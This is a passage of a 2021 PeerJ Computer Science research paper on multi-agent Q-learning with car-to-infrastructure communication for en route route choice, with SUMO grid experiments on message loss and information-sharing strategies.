opportunity to learn and/or adapt to the traffic patterns faced daily. To address the challenges posed by an ever increasing demand, transportation authorities and traffic experts try to distribute the flow among existing routes in order to minimize the overall travel time. Often, this task involves some form of communication with the drivers. Traditional approaches such as variable message panels or radio broadcast are now being replaced by directed (and potentially personalized) communication, via new kinds of communication devices. How to cite this article dos Santos GD, Bazzan ALC. 2021. Sharing diverse information gets driver agents to learn faster: an application in en route trip building. PeerJ Comput. Sci. 7:e428 DOI 10.7717/peerj-cs.428 Submitted 11 November 2020 Accepted 13 February 2021 Published 16 March 2021 Corresponding author Ana L.C. Bazzan, bazzan@inf.ufrgs.br Academic editor José Manuel Galán Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.428 Copyright 2021 dos Santos and Bazzan Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.428 mailto:bazzan@�inf.�ufrgs.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.428 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ While the current pattern is that each individual driver selects a route based on his/her own experience, this is changing as new technologies allow all sorts of information exchange. Examples of these technologies are not only based on broadcast (e.g., GPS or cellphone information) but also a two-way communication channel, where drivers not only receive traffic information but also provide them. Hence, currently, many traffic-related applications for cellphones deal with the idea of a central authority in charge of somehow assigning routes for drivers. Examples are Waze, Google apps, etc. Since their specific algorithms are not published, one can only guess that they try to find a feasible solution, given a set of constraints that they are able to infer from the current data they collect. What seems certain is that these platforms work in a centralized way, based on data they collect when their customers or users use their specific apps. Also, they do not handle locally collected and processed data. This leads to them being ineffective when the penetration of their services is low as, for example, during the initial stages of the 2020 pandemics, when few drivers were using the system. A way to mitigate this could be to decentralize the processing of information, as proposed here, and passing it to drivers to make their route choices. Our method has some resemblance with the notion of traffic assignment (see “Background and Related Work”), since it is based on the fact that drivers collect experience by trying out several routes until they settle on those that lead to the least travel time. Traffic assignment approaches work (and indeed were developed for this purpose) well for planning tasks, that is, how to plan a traffic network (or change an existing one) in order to minimize travel costs. However, route choice is not related to planning tasks but, rather, is an operational aspect, especially in commuting situations, where drivers repeatedly travel from the same origin to the same destination. Besides, traffic assignment is a centralized approach, in which the drivers do not actively select routes. Rather, routes are assigned to them. Thus, it is important to investigate how drivers do select routes in their daily commuting tasks. Multi-agent reinforcement learning (MARL) can be used for such purpose, as it fits the task of letting agents decide, autonomously, how to select routes to go from A to B. This is realized by letting agents iteratively choose their least costly route based on their own learning experiences. Such approach has been tried before, as described in the section on related works. In fact, it has been shown that reinforcement learning is a good technique to investigate route choice. However, the learning process can be inefficient, as for instance, it may take time, since the agents have to collect experiences by themselves. As this happens to be a very noisy environment, the signal an agent gets can be little discriminatory (e.g., due to the presence of other learning agents, an agent may get the same signal for very different actions, or, conversely, different signals for the same action). Thus, our long term aim is to investigate forms of accelerating the learning process. One of these forms is by giving more information to the agents. There are only few works that consider new technologies to this experience, as for instance those tied to vehicular communication in general. In the present article, we extend a method that connects MARL to new technologies such as car-to-infrastructure communication (C2I). These were formulated with the goal dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 2/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ of investigating how C2I communication could act to augment the information drivers use in their learning processes associated with choices of routes. In such approach, whole routes are not imposed or recommended to drivers, but rather, these receive local information about the most updated state of the links that happen to be near their current location. This way, drivers can change their route on-the-fly (the so-called en route trip building). Further, that approach assumes that the infrastructure is able to communicate with the vehicles, both collecting information about their most recent travel times (on given links), as well as providing them with information that was collected from other vehicles. However, another assumption is that messages are never lost, which is not realistic. Thus, in the present article, we relax this assumption and admit loses of messages, as well as investigate the impact of them on the overall performance. As a result of such extension, we are able to confirm that the MARL technique combined with a C2I model can accelerate the learning process. Moreover, our approach is tolerant to information loses. In short, the contribution of the present work is manifold. First, we employ MARL to the task of learning how to go from A to B. Second, we do this using a non trivial scenario (as it is the case in most of the literature), in which there are more than one origin-destination pair. Third, we depart from most of the literature where the learning task considers that the driver agents already know a set of (pre-computed) routes to select among. Rather, we let these agents build their trips en route. This in turn requires the use of a microscopic, agent-based approach, where agents can potentially use different pieces of information in order to perform en route choice. This again contrasts to most of the literature, which uses macroscopic modeling (e.g., by means of abstract cost functions to compute travel times). Fourth, we connect MARL with the aforementioned communication technologies, in order to investigate whether the learning process can be accelerated by exchange of local information only. Lastly, we extend a previous approach by investigating its robustness to loses of messages. This article is organized as follows. The “Background and Related Work” briefly presents some background concepts on traffic assignment and reinforcement learning, as well as the panorama on the related work. Following, our methods and experimental results are presented and discussed. We review the general conclusions and outline the future work in the last section. BACKGROUND AND RELATED WORK The traffic assignment problem In transportation, the traffic assignment problem (TAP) refers to how to connect a supply (traffic infrastructure) to its demand, so that the travel time of vehicles driving within a network is reduced. This network can be seen as a graph G = (N, E), where N is the set of nodes that operate as junctions/intersections, and E is a set of directed links (or edges, as both terms are used interchangeably) that connect the nodes. Hence the goal is then to assign vehicles to routes so that the travel time is minimized. For more details, the reader is referred to Chapter 10 in Ortúzar & Willumsen (2011). For our purposes it suffices to mention that classical approaches aim at planning tasks, are dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 3/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ centralized (i.e., trips are assigned by a central authority, not selected by individual drivers). Also, the main approaches are based on iterative methods that seeks convergence to the user equilibrium (see “User Equilibrium”). User equilibrium When it comes to reaching a solution to the TAP, one can take into account two perspectives: one that considers the system as a whole, and one that considers each user’s point of view. In the system perspective, the best solution refers to the system reaching the best average travel time possible; this is the so called system optimum (SO), or Wardrop’s second principle (Wardrop, 1952). We stress that the SO is a desirable property, but hardly achievable given that it comes at the cost of some users, who are not able to select a route leading to their personal best travel times. On the other hand, and most relevant for our current work, at the user’s perspective, the system reaches the user (or Nash) equilibrium (UE) when there is no advantage for any individual to change its routes in order to minimize their travel time, as stated in the first Wardrop’s principle (Wardrop, 1952). The UE can be achieved by means of reinforcement learning, as discussed next. Reinforcement learning Reinforcement learning (RL) is a machine learning method whose main objective is to make agents learn a policy, that is, how to map a given state to a given action, by means of a value function. RL can be modeled as a Markov decision process (MDP), where there is a set of states S, a set of actions A, a reward function R : S � A ! R, and a probabilistic state transition function T(s, a, s′) / [0, 1], where s ∈ S is a state the agent is currently in, a ∈ A is the action the agent takes, and s′ ∈ S is a state the agent might end up, taking action a in state s, so the tuple (s, a, s′, r) states that an agent was in state s, then took action a, ended up in state s′ and received a reward r. The key idea of RL is to find an optimal policy p�, which maps states to actions in a way that maximizes future reward. Reinforcement learning methods fall within two main categories: model-based and model-free. While in the model-based approaches the reward function and the state transition are known, in the model-free case, the agents learn R and T by interacting with an environment. One method that is frequently used in many applications is Q-Learning (Watkins & Dayan, 1992), which is a model-free approach. In Q-learning, the agent keeps a table of Q-values that estimate how good it is for it to take an action a in state s, in other words, a Q-value Q(s, a) holds the maximum discounted value of going from state s, taking an action a and keep going through an optimal policy. In each learning episode, the agents update their Q-values using the Eq. (1), where a and γ are, respectively, the learning rate and the discounting factor for future values. Qðs; aÞ ¼ Qðs; aÞ þ aðr þ gmaxa½Qðs0; a0Þ � Qðs; aÞ�Þ (1) In a RL task, it is also important to define how the agent selects actions, while also exploring the environment. A common action selection strategy is the ε-greedy, in which dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 4/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ the agent chooses to follow the optimal values with a probability 1 − ε, and takes a random action with a probability ε. While this basic approach also works in MARL, it is important to stress some challenging issues that arise in an environment where multiple agents are learning simultaneously. Complicating issues arise firstly due to the fact that while one agent is trying to model the environment (other agents included), the others are doing the same and potentially changing the environment they share. Hence the environment is inherently non-stationary. In this case, convergence guarantees, as previously known from single agent reinforcement learning (e.g., Watkins & Dayan (1992) regarding Q-learning), no longer hold. A further issue in multi-agent reinforcement learning is the fact that aligning the optimum of the system (from the perspective of a central authority) and the optimum of each agent in a multi-agent system is even more complicated when there is a high number of agents interacting. Related work Solving the TAP is not a new problem; there have been several works that aim at solving it. In one front, there are have classical methods (see Chapter 10 in Ortúzar & Willumsen (2011)), which, as aforementioned, mostly deal with planning tasks. Further, the TAP can also be solved by imposing tolls on drivers (Sharon et al., 2017; Buriol et al., 2010; Tavares & Bazzan, 2014). The latter specifically connects road pricing with RL. However, the focus is on learning which prices to charge. Besides these two fronts, RL for route choice is turning popular. When we refer to RL methods to solve the TAP, these usually fall into two categories: a traditional RL method, and a stateless one. Contrarily to the traditional approach, in the stateless case, the agents actually have only one state that is associated with its origin-destination pair, and they choose which actions to take. Actions here correspond to the selection of one among k pre-computed routes. Works in this category are Ramos & Grunitzki (2015) (using a learning automata approach), and Grunitzki & Bazzan (2017) (using Q-learning). In Zhou et al. (2020) the authors used a learning automata approach combined with a congestion game to reach the UE. Tumer, Welch & Agogino (2008) adds a reward shaping component (difference utilities) to Q-learning, aiming at aligning the UE to a socially efficient solution. Apart from the stateless formulation, in the traditional case, agents may found themselves in multiple states, which are normally the nodes (intersections) of the network. Actions then correspond to the selection of one particular link (edge) that leaves that node. In Bazzan & Grunitzki (2016) this is used to allow agents to learn how to build routes. However, they use a macroscopic perspective by means of cost functions that compute the abstract travel time. In the present article, the actual travel time is computed by means of a microscopic simulator (details ahead). A microscopic approach is required to handle communication issues. As aforementioned, our approach also includes C2I communication, as these kinds of new technologies may lead agents to benefit from sharing their experiences (in terms of dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 5/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ travel times), thus reducing the time needed to explore, as stated in Tan (1993). The use of communication in transportation systems, as proposed in the present paper, has also been studied previously (Grunitzki & Bazzan, 2016; Bazzan, Fehler & Klügl, 2006; Koster et al., 2013; Auld, Verbas & Stinson, 2019). However, these works handle communication at abstract levels, using macroscopic approaches. In some cases, the information is manipulated to bias the agents to reach an expected outcome. Moreover, most of these works deal with vehicular communication (i.e., messages are shared among the vehicles), or are based on broadcast of messages by one or few entities. This scheme approaches either systems such as traffic apps we see nowadays (Waze, etc.), or messages distributed by the traffic authority (as it used to be the case some time ago, using radio or variable message panels on main roads as in Wahle et al. (2000)). Neither vehicular communication nor broadcast are appropriate to investigate the impact of sharing local information, as we do here. A previous work by us (Santos & Bazzan, 2020) has presented preliminary results about the performance of combining RL with C2I against RL without communication. However, in this work, it is assumed that messages exchanged among the various actors do not get lost, which is irrealistic. Therefore, in the present article we focus on the impact of communication failure and also on what type of information yields better results. In a different perspective, works such as Yu, Han & Ochieng (2020) evaluate the impact of incomplete information sharing in the TAP. They do not employ a RL-based but rather a classical approach, namely multinomial Logit model. More recently, Bazzan & Klügl (2020) discuss the effects of a travel app, in which driver agents share their experiences. The idea is to “mimic” what happens in an office where colleagues chat about their habits and route choice experiences. In the present article, driver agents do not directly share their experiences since the work in Bazzan & Klügl (2020) has shown that this process may lead to sub-optimal results, due to agents not taking local issues into account. This is hardly possible in that work since Bazzan & Klügl (2020) use a macroscopic simulator, where location is an abstract concept. Rather, the present paper proposes—as shown in the “Methods”—that the information is exchanged via an intersection manager, that is, a manager of a portion of the network. In any case, this sharing of knowledge was proposed in other scenarios (Tan, 1993) and refers generally to the research on transfer learning (Taylor et al., 2014; Torrey & Taylor, 2013; Fachantidis, Taylor & Vlahavas, 2019; Zimmer, Viappiani & Weng, 2014). It is important to note though, that virtually all these works deal with cooperative environments, where it makes sense to transfer knowledge. In non-cooperative learning tasks, as it is the case of route choice, naive transfer of learned policies may lead to every agent behaving the same, which runs against the notion of efficient distribution of agents in the road network. METHODS Our approach is based on using communication to augment the information each agent1 has and, hence, the learning performance. The next three subsections discuss, respectively: how the infrastructure is represented; how communication occurs; and the details of the RL algorithm. We then formalize the details as an algorithm. 1 Henceforth, the term agent is used to refer to a vehicle and/or driver agent. dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 6/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ Representing the infrastructure We assume that every node n ∈ N present in the network G is equipped with a communication device (henceforth, CommDev) that is able to send and receive messages in a short range signal (e.g., with vehicles around the intersection). Figure 1 shows an scheme that represents G and CommDevs within G. Using the short-range signal, the CommDevs are able to communicate with vehicles that are close enough, and are able to exchange information related to local traffic data (refer to next section for details). Moreover, these CommDevs are able to store the data exchanged with the agents in order to propagate this information to other agents that may use nearby intersections in the near future. The arrows that connect CommDevs in Fig. 1 represent a planar graph, meaning that every CommDev is connected and can communicate to its neighboring devices. This permits that CommDevs get information about the traffic situation in neighboring edges, which is then passed to the agents. How communication works Every time an agent reaches an intersection, prior to choosing an action (the next intersection to visit), it communicates with the intersection’s CommDev (see Fig. 1) to exchange information. The actual piece of information sent from agents to CommDevs is travel times (hence, rewards) received by the agents, regarding their last action performed. Conversely, the infrastructure communicates to the agent information about the state of the nearby edges, in terms of which rewards an agent can expect if it selects to use that particular link. This information can be of various forms. In all cases, the expected Figure 1 Scheme of the communication infrastructure. This figure was designed using assets from https://www.vectorportal.com/ and https://www.freepik.com. All assets used fall under license CC BY 4.0. Full-size DOI: 10.7717/peerj-cs.428/fig-1 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 7/20 https://www.vectorportal.com/ https://www.freepik.com http://dx.doi.org/10.7717/peerj-cs.428/fig-1 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ reward is computed by taking into account the rewards informed by other agents, when they have used nearby links. In the experiments, we show results where CommDevs communicate expected rewards that are either an aggregation (over a time window) or just a single value. In any of these cases, an agent receiving such information will then take it into account when selecting an action (choice of a link) in that particular state (a node). Next, details about how the information is processed, by both the CommDevs and the vehicle agents, are given. Information hold by infrastructure Each CommDev uses queue based data structures to hold the rewards informed by each agent that passes through it. Specifically, each edge is associated with one data queue. These queues have a maximum size, and when new information arrives after the queue is full, the oldest reward stored is discarded to make room to the most recent one. When an agent requests information, the CommDev retrieves the rewards collected for the agent’s possible actions and passes it to that agent. Recall that an action corresponds to a link to be traveled next, in order to form a route to the agent’s destination. Information used by the agent In a standard Q-learning algorithm, the agents update their Q-values based on the feedback from the action they have just taken. However, in our case agents also update their Q-values based on the expected rewards received by the infrastructure. This means that every time they reach an intersection, they update their Q-values with the information provided by the CommDevs. We do this in order to accelerate the learning process. Instead of just considering its own past experiences, the information provided by the CommDevs augment the knowledge each agent has. It is worth noting that a distinguishing characteristic of our approach is that it deals with local information, thus the information received from the CommDev only concerns actions that can be selected from that particular node. Given a network G, every agent (vehicle) v ∈ V has a pair (o, d) ∈ N × N, that defines its origin-destination pair (OD-pair). Nodes n ∈ N are seen as states the agents might be in, and the outgoing edges of a node n are the possible actions for that given state. Hence, the agents build their routes on-the-fly by visiting nodes and edges. Upon choosing an action (edge) e, v perceives its reward. We recall that being a microscopic model, this reward is actually computed by the simulator, rather than by an abstract cost function, as it would be the case in a macroscopic model. Assuming that the simulator reports a travel time of tve for agent v traveling on edge e, the reward is −tve, as we want to make sure the agents prefer to take edges that minimize travel times. This alone does not guarantee that the agents will reach their destination fast, as they might end up running in loops throughout the network. Hence a positive bonus B is given to each agent that reaches its destination, giving them incentives to end their trips as fast as possible. dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 8/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ We deal with a commuting scenario, where each agent performs day-to-day experiments in order to reach an equilibrium situation, in which no agent can reduce its travel time by changing routes. Because agents belong to different OD pairs and/or select different routes, their trips take different number of simulation steps. These steps represent elapsed seconds in simulation time. Hence, this means that not every agent finishes its trip simultaneously and, therefore, the standard notion of a learning episode cannot be used here. Rather, each agent has its own learning episode that will take as many simulation steps as necessary to reach its destination. Next, we explain the main parts of our approach, which can be seen in Algorithm 1. Line 1 list the inputs of Algorithm 1: G is the topology of the network, D is the demand (flow rate) that is inserted in the network, P is the set of OD-pairs, and M is the maximum number of steps to simulate. It is also necessary to set α, γ (both relating to Eq. (1)), ε for controlling the action selection and the exploration-exploitation strategy, and the bonus B. The main loop is presented between lines 3 and 17, where the learning and the communication actually take place. The first if statement shown in line 5 takes care of all agents that finished their trips in the current step: agents perceive their reward plus the bonus for finishing the trip. At Line 7, each agent informs the corresponding CommDevs the rewards, and since its trip has ended, it gets reinserted at the origin node to start a new learning episode (as this is a commuting scenario). The if statement at line 9 represents the intermediary nodes, where each agent also perceives its reward and informs the CommDev (line 11) about the reward just Algorithm 1 Q-learning with C2I. 1: Input: G, D, P, M, α, γ, ε, B 2: s←0 3: while s < M do 4: for v in V do 5: if v. f inished_trip() then 6: v.update_Q_table(B−v.last_edge_travel_time) 7: G.commDev[v.curr_node].update_queue(v.last_reward, v.last_edge) 8: v.start_new_commuting_trip() 9: else if v.has_reached_a_node() then 10: v.update_Q_table(−v.last_edge_travel_time) 11: G.commDev[v.curr_node].update_queue(v.last_reward, v.last_edge) 12: v.update_Q_values(G.commDev[v.curr_node].in f o) 13: v.choose_action() 14: end if 15: end for 16: s←s+1 17: end while dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 9/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ experienced, so that the CommDev can update its queue structure. In line 7, each agent updates its Q-value for the last action based on its own experience, that is, with the actual reward received for traveling through the last link. Following, a CommDev also informs agents about the rewards that can be expected from the actions each agent might take next (line 12). Each agent then updates its Q-table and chooses an action. EXPERIMENTS, RESULTS, AND ANALYSIS Scenario: network and demand Simulations were performed using a microscopic tool called Simulation of Urban Mobility (SUMO, Lopez et al. (2018)). SUMO’s API was used to allow vehicle agents to interact with the simulator en route, that is, during simulation time. The scenario chosen is a 5 × 5 grid depicted in Fig. 2; each line in the figure represents bi-directed edges containing two lanes, one for each traffic direction. It is also worth noting that each directed edge is 200 m long. The demand was set to maintain the network populated at around 20–30% of its maximum capacity, which is considered a medium to high density. Recall that no real-world network is fully occupied at all times, and that the just mentioned density level does not mean that there will not be edges fully occupied, which happens from time to time; this percentage is just the average over all 50 edges. This demand was then distributed between the OD-pairs as represented in Table 1. The last column represents the volume of vehicles per OD-pair. Those values were selected so that the shorter the path, the smaller the demand, which seems to be a more realistic assumption than a uniform distribution of the demand. A0 A1 A2 A3 A4 B0 B1 B2 B3 B4 C0 C1 C2 C3 C4 D0 D1 D2 D3 D4 E0 E1 E2 E3 E4 Left0 Left1 Left2 Left3 Left4 Right0 Right1 Right2 Right3 Right4 Bottom0 Bottom1 Bottom2 Bottom3 Bottom4 Top0 Top1 Top2 Top3 Top4 Figure 2 5 × 5 Grid Network. Full-size DOI: 10.7717/peerj-cs.428/fig-2 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 10/20 http://dx.doi.org/10.7717/peerj-cs.428/fig-2 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ Two points are worth reinforcing here. First, vehicles get reinserted at their corresponding origin nodes, so that we are able to keep a roughly constant insertion rate of vehicles in the network, per OD pair. However, this does not mean that the flow per link is constant, since the choice of which link to take varies a lot from vehicle to vehicle, and from time to time. Second, despite being a synthetic grid network, it is not trivial, since it has 8 OD pairs, which makes the problem complex as routes from each OD pair are coupled with others. As seen in Table 1, we have also increased such coupling by designing the OD pairs so that all routes traverse the network, thus increasing the demand for using the central links. Q-learning parameters A study conducted by Bazzan & Grunitzki (2016) shows that, in an en route trip building approach, the learning rate a does not play a major role, while the discount factor γ usually needs to be high in discounted future rewards, as it is the case here. Thus a value of a = 0.5 suits our needs. We remark however that we have also played with this parameter. As for the discount factor γ, we have performed extensive tests and found that a value of γ = 0.9 performs best. For the epsilon-greedy action selection, empirical analysis pointed to using a fixed value of ε = 0.05. This guarantees that the agents will mostly take a greedy action (as they only have a 5% chance to make a non-greedy choice), and also take into account that the future rewards have a considerable amount of influence in the agent’s current choice, since γ has a high value. For the bonus at the end of each trip, after tests, a value of B = 1,000 was used. Recall that this bonus aims at compensating the agent for selecting a jammed link, if it is close to its destination, rather than trying out detours via a link that, locally, seems less congested, but that will lead the agent to wander around, rather than directly go to its destination. We remark that trips take a rough average of 450 time steps thus this value of B fits the magnitude of the rewards. Performance metric and results While each agent perceives its own travel time, both after traversing each link, and after finishing its trip, we need an overall performance to assess the quality of the proposed Table 1 Demand per OD-pair. Origin Destination Demand Bottom0 Top4 102 Bottom1 Top3 86 Bottom3 Top1 86 Bottom4 Top0 102 Left0 Right4 102 Left1 Right3 86 Left3 Right1 86 Left4 Right0 102 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 11/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ method. For this, we use a moving average (over 100 time steps) of the complete route travel time, for each agent that has finished its trip. Given the probabilistic nature of the process, it is necessary to run repetitions of simulations. Thus, 30 runs were performed. Plots shown ahead thus depict the average and the standard deviations. In order to evaluate how the communication affects the learning process, some different policies and comparisons were performed, these different methods are described in the following sections. QL with C2I vs dynamic user assignment For sake of contrasting with a classical approach, Fig. 3 shows a comparison between our QL with C2I approach and a method called Dynamic User Assignment (DUA), which is an iteractive method implemented by the SUMO developers. We remark that DUA is a centralized, not based on RL approach. Dynamic User Assignment works as follows: it performs iterative assignment of pre-computed, full routes to the given OD-pairs in order to find the UE2. In our tests, DUA was run for 100 iterations. Note that a DUA iteration corresponds to a trip, and a new iteration only starts when all trips have reached their respective destinations. The output of DUA is a route that is then followed by each vehicle, without en route changes. Since DUA also has a stochastic nature, our results correspond to 30 repetitions of DUA as well. Figure 3 shows that, obviously, at the beginning, the performance of our approach reflects the fact that the agents are still exploring, whereas DUA has a better performance since a central authority determines which route each agent should take. This is possible since this central authority holds all the information, which is not the case in the MARL based approach, where each agent has to explore in order to gain information. In our approach, after a certain time, the agents have learned a policy to map states to action and, by using it, they are able to reduce their travel times. Figure 3 QL with C2I vs DUA. Full-size DOI: 10.7717/peerj-cs.428/fig-3 2 For details on how the DUA method is made the reader may refer to https:// sumo.dlr.de/docs/Demand/Dynamic_ User_Assignment.html. dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 12/20 http://dx.doi.org/10.7717/peerj-cs.428/fig-3 https://sumo.dlr.de/docs/Demand/Dynamic_User_Assignment.html https://sumo.dlr.de/docs/Demand/Dynamic_User_Assignment.html https://sumo.dlr.de/docs/Demand/Dynamic_User_Assignment.html http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ Before discussing the actual results, we remark that a SUMO time step corresponds roughly to one second. Our experiments were run for about 50,000 time steps. A learning episode comprehends hundreds of time steps, as the agent has to travel from its origin to its destination. In short, a learning episode is not the same as a simulation time step. Given that the agents re-start their trips immediately, different agents have different lengths for their respective learning episodes, thus the learning process is non-synchronous. Using our approach, on average, an episode takes roughly 500 time steps, thus agent reach the user equilibrium in about 100 episodes. For RL standards, this is a fast learning process, especially considering that we deal with a highly non-stationary environment, where agents get noisy signals. However, we also remark that, for practical purposes, the policy can be learned off-line, and, later, embedded in the vehicle. To give a specific picture, Table 2 shows the actual travel times after time step 50,000. We remark that we could have measured roughly the same around step 30,000. It can be seen that our approach outperforms DUA shortly after time step 10,000. Also noteworthy is the fact that, at any time step, agents still explore with probability ε = 5% thus there is room for improvements if other forms of action selection are used. QL with C2I vs QL without communication Our approach is also compared to standard Q-learning, thus without communication, which means that the agents learn their routes only by their own previous experiences, without any augmented knowledge regarding the traffic situation and the experiences of other agents. In Fig. 4, we can divide the learning process in both cases shown in Fig. 4 in two distinct phases: the exploration phase, where the agents have yet no information about the network and explore it to find their destination “that is when the spikes in the learning curves can be seen”; and the exploitation phase, when agents know the best actions to take in order to experience the lowest travel time possible. Both approaches converge to the same average travel times in the exploitation phase. However, the advantage of our approach comes in the exploration phase. As we see in Fig. 4, the exploration phase in the QL with C2I algorithm is reduced by a considerable amount when compared to the traditional QL algorithm, meaning that in our case the user equilibrium is reached earlier. Table 3 compares the travel time measured in both cases at the time step 20,000, when our approach has already converged, but the standard Q-learning has not. Communication success rate In the real world, it might be the case that some information gets lost due to failure in the communication devices. In order to test what happens when not all messages reach the Table 2 Travel time measured for DUA and QL with C2I at time step 50,000. Method Travel time at step 50 k DUA ≈560 QL with C2I ≈470 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 13/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ recipient, a success rate was implemented to test how the our approach performs if communication does not work as designed. Specifically, every time an agent needs to communicate with the infrastructure, the message will reach the destination with a given success rate. This was implemented by means of a randomly generated value, which is then compared to the success rate to determine whether or not the simulator should ignore the message, thus being a metaphor for a non-delivered message. Such a scheme is applied to any kind of communication between the infrastructure and the agent, that is, regardless if it is from an agent to a CommDev, or vice-versa. If a message is lost, then: (i) a CommDev does not get to update its data structure, and (ii) an agent does not get to update its Q-table. Other than that, the method behaves exactly as described by Algorithm 1. Experiments were performed varying the target success rate. For clarity, we show the results in two plots. Figure 5 compares the approach when the success rate is with 100% (thus the performance already discussed regarding the two previous figures), to one where the communication succeeds in only 75% of the times. In Fig. 6, we depict the cases for success rate of 25% and 50%. For specific values, Table 4 lists the average travel times for all these cases at time step 20,000, since at that time the learning processes have nearly converged. Figure 4 QL with C2I vs QL without communication. Full-size DOI: 10.7717/peerj-cs.428/fig-4 Table 3 Travel time measured for QL and QL with C2I at time step 20,000. Method Travel time at step 20k QL ≈676 QL with C2I ≈483 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 14/20 http://dx.doi.org/10.7717/peerj-cs.428/fig-4 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ It is remarkable that the system not only tolerates some loss of information, but also performs slightly better when the success rate is 75% or even 50%. If one compares this case to the one in which 100% of the messages reach their destinations, one sees that the learning process is accelerated if agents do not have the very same information that other agents also receive. This is no surprise, as pointed out in the literature on the disadvantages of giving the same information to everyone. What is novel here is the fact that we can show that this is also the case when information is shared only at local level, as Figure 5 QL with C2I: comparison between 75% and 100% success rate. Full-size DOI: 10.7717/peerj-cs.428/fig-5 Figure 6 QL with C2I: comparison between 25% and 50% success rate. Full-size DOI: 10.7717/peerj-cs.428/fig-6 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 15/20 http://dx.doi.org/10.7717/peerj-cs.428/fig-5 http://dx.doi.org/10.7717/peerj-cs.428/fig-6 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ well as when the communication is between vehicles and the infrastructure, not among all vehicles themselves. As expected, when we look at the case with a low success rate of 25%, we observe several drawbacks since the communication rate is getting closer to no communication at all: (i) the average travel time increases, (ii) the learning process takes longer, and (iii) the standard deviation also increases (meaning that different trips may take very different travel times and, possibly, different routes). Different strategies for storing information at the infrastructure Apart from investigating what happens when information is lost, we also change the way CommDevs compute and share the reward information to the driver agents. Here the main motivation was to test what happens when the infrastructure is constrained by a simpler type of hardware, namely one that can store much less information (recall that the original approach is based on a queue-like data structure). To this aim, we conducted experiments in which the goal was to test which type of information is best for the infrastructure to hold and pass on to the agents. We have devised three ways to do this: (i) the infrastructure only holds and informs the highest travel time (hence the most negative reward) value to the agents; (ii) the infrastructure informs the lowest reward (hence the least negative) to the agents; (iii) the infrastructure holds only the latest (most recent) travel time value received. Note that, in all these cases, the infrastructure only needs to store a single value, as opposed to the case in which the infrastructure stores a queue of values in order to compute a moving average. Figure 7 shows a comparison between the different policies. For clarity, we omit the deviations but note that they are in the same order as the previous ones. The best case seems to be associated with the use of the most recent travel time information, as seen both in Fig. 7 and Table 5. Communicating the lowest travel time might look good at first sight. But it has as drawback that this leads all agents to a act greedly and thus using the option with least travel time. This ends up not being efficient as seen in Fig. 7. Conversely, communicating the highest travel time is motivated by the fact that the infrastructure might want to distribute the agents among the options available, thus communicating a high travel time leads to not all agents considering it: since some would have experienced a better option before and hence have this knowledge in their Q-tables, they will not use the information received. This proves to be the second best strategy, only behind the aforementioned strategy on communicating the latest information. The reason for the good performance of the latter is the fact that the latest Table 4 Travel time measured for each success rate at time step 20,000. Success rate (%) Travel time at step 20k 25 ≈501 50 ≈467 75 ≈461 100 ≈483 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 16/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ information is diverse enough (i.e., varies from recipient agent to agent) so that it also guarantees a certain level of diversity in the action selection, thus contributing to a more even distribution of routes. CONCLUSIONS AND FUTURE WORK A wise route choice is turning more and more important when the demand is increasing and road networks are not being expanded in the same proportion. MARL is an attractive method for letting agents autonomously learn how to construct routes while they are traveling from A to B. This article presented a method that combines MARL with C2I communication. Vehicles interact with the infrastructure every time they reach an intersection. While they communicate the travel times they have experienced in nearby links, they also receive the expect travel times regarding their next possible link choices. We have extended a previous approach by relaxing the assumption that all messages are sent and received, that is, there is no loss of messages. To the best of our knowledge, this is a novel investigation to scenarios dealing with learning based route choice, where the there is a sharing of local information via C2I. Figure 7 QL with C2I with different strategies. Full-size DOI: 10.7717/peerj-cs.428/fig-7 Table 5 Travel time measured for each strategy at time step 20,000. Strategy Travel time at step 20 k Highest travel time ≈472 Latest travel time ≈467 Lowest travel time ≈538 QL with C2I ≈483 dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 17/20 http://dx.doi.org/10.7717/peerj-cs.428/fig-7 